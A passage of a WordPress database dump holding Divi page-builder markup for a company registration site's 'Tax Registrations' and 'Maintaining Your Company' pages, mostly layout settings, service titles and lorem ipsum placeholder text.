animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Tax Registrations</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Pellentesque in ipsum id orci porta dapibus. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/Asset-1.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.6\" max_width=\"65%\" module_alignment=\"center\" width=\"54%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why Being Tax Compliant  Is Important?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus. </p>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictu</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Urgent Vat Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Tax Clearance Certificate\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Import & Export Code Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Salary Tax Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Business Income Tax Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Vat Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"3.25\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Urgent Vat Registration\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-urgent.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Tax Clearance Certificate \" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Tax-Clearance-Certificate.gif\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Import & Export Code Registration\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Importers-Exporters-Code-final.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Build For the All of the Biggest Product Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\" column_structure=\"1_5,1_5,1_5,1_5,1_5\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\" column_structure=\"1_5,1_5,1_5,1_5,1_5\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_style=\"wave\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>A Proven Process Time &amp; Time Again</h2>\n<p>Vivamus suscipit tortor eget felis porttitor volutpat. Vivamus suscipit tortor eget felis porttitor volutpat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Praesent sapien</p>[/et_pb_text][et_pb_button button_text=\"Online Project Application\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Tax Registrations','','inherit','closed','closed','','32714-revision-v1','','','2019-08-14 10:42:30','2019-08-14 08:42:30','',32714,'https://companyregistration.online/32714-revision-v1/',0,'revision','',0),(32724,3,'2019-08-14 11:07:36','2019-08-14 09:07:36','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Maintaining Your Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" 